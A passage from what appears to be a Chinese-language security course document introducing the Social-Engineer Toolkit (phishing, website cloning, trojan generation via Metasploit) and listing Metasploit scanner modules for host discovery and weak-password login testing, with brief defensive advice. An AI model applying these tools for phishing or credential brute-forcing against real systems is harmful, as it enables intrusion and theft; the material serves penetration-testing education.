郵件、虛假網(wǎng)站、惡意文檔等,可以模擬多種攻擊場景,目的是為了幫助安全專業(yè)人員更好地進(jìn)行社會(huì)工程學(xué)攻擊,并提高組織的安全意識(shí)。在此簡要介紹SET功能、使用方法等。SET的使用方法首先,啟動(dòng)SET。在終端中執(zhí)行命令setoolkit,或者在KaliLinux的桌面環(huán)境中,依次選擇“應(yīng)用程序”--“漏洞利用工具集”,將自動(dòng)打開一個(gè)顯示setoolkit命令運(yùn)行的終端。啟動(dòng)后,SET會(huì)展示一系列選項(xiàng)。用戶可以根據(jù)需要選擇相應(yīng)的模塊。例如,選擇社會(huì)工程學(xué)攻擊模塊,并進(jìn)一步選擇網(wǎng)絡(luò)頁面釣魚攻擊或釣魚網(wǎng)站攻擊等具體功能。對(duì)于網(wǎng)站克隆功能,SET允許用戶克隆大部分網(wǎng)站。用戶只需輸入要克隆的網(wǎng)址,SET就會(huì)進(jìn)行克隆操作。但請(qǐng)注意,這種功能僅供演示和學(xué)習(xí)使用,切勿用于非法活動(dòng)。此外,SET還集成了木馬生成工具,可以生成木馬并調(diào)用MSF框架對(duì)遠(yuǎn)程主機(jī)進(jìn)行控制。用戶可以按照SET的提示和指引,逐步完成木馬的生成和設(shè)置。SET應(yīng)用場景SET的應(yīng)用場景非常廣泛,可以用于對(duì)組織進(jìn)行滲透測試、對(duì)員工進(jìn)行安全意識(shí)教育、對(duì)個(gè)人進(jìn)行安全保護(hù)、對(duì)惡意軟件分析等多種場景。SET可以模擬多種攻擊場景,如欺騙郵件、虛假網(wǎng)站、惡意文檔等,可以幫助安全專業(yè)人員更好地進(jìn)行社會(huì)工程學(xué)攻擊,提高組織的安全意識(shí),幫助員工養(yǎng)成良好的安全習(xí)慣,減少安全事件的發(fā)生。在滲透測試中,SET可以模擬真實(shí)的攻擊手段,幫助安全專業(yè)人員發(fā)現(xiàn)系統(tǒng)中的安全漏洞。幫助分析惡意軟件,惡意軟件是一種常見的安全威脅,可以對(duì)組織的網(wǎng)絡(luò)和系統(tǒng)造成嚴(yán)重的影響。SET可以用于對(duì)惡意軟件進(jìn)行分析,了解其攻擊手段和特點(diǎn),提供相應(yīng)的防御措施。在惡意軟件分析中,SET可以將惡意軟件進(jìn)行模擬,了解其攻擊手段和特點(diǎn)。通過使用SET進(jìn)行惡意軟件分析,安全專業(yè)人員可以更好地了解惡意軟件的攻擊特點(diǎn)和漏洞,及時(shí)采取相應(yīng)的防御措施,保護(hù)組織的網(wǎng)絡(luò)和系統(tǒng)。SET防范措施SET防范措施的重要性了解并實(shí)施有效的SET防范措施,可以有效防止社會(huì)工程學(xué)攻擊,保護(hù)個(gè)人和組織的安全。提高安全意識(shí)通過培訓(xùn)和教育,提高員工對(duì)SET攻擊的警覺性,是防范社會(huì)工程學(xué)攻擊的第一步。實(shí)施嚴(yán)格的訪問控制通過設(shè)置復(fù)雜的密碼、定期更換密碼、限制訪問權(quán)限等方式,可以有效防止未經(jīng)授權(quán)的訪問。Metasploit框架之專用掃描模塊Metasploit框架之專用掃描模塊Metasploit除集成NMAP等漏洞掃描工具,還包括了大量專用掃描工具,如主機(jī)發(fā)現(xiàn)工具、端口掃描工具、服務(wù)掃描與查點(diǎn)工具等,默認(rèn)保存于/usr/share/metasploit-framework/modules/auxiliary/scanner目錄。Metaploit常用掃描模塊模塊功能auxiliary/scanner/discovery/arp_sweep主機(jī)發(fā)現(xiàn)auxiliary/scanner/discovery/udp_sweep主機(jī)發(fā)現(xiàn)auxiliary/scanner/portscan端口掃描auxiliary/scanner/smb/smb_versionSMB系統(tǒng)版本掃描auxiliary/scanner/smb/smb_loginSMB弱口令掃描auxiliary/scanner/ssh/ssh_loginSSH登錄測試auxiliary/scanner/mssql/mssql_pingMSSQL主機(jī)信息掃描auxiliary/scanner/mssql/mssql_loginMSSQL弱口令掃描auxiliary/scanner/telnet/telnet_loginTELNET弱口令掃描MySQL

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論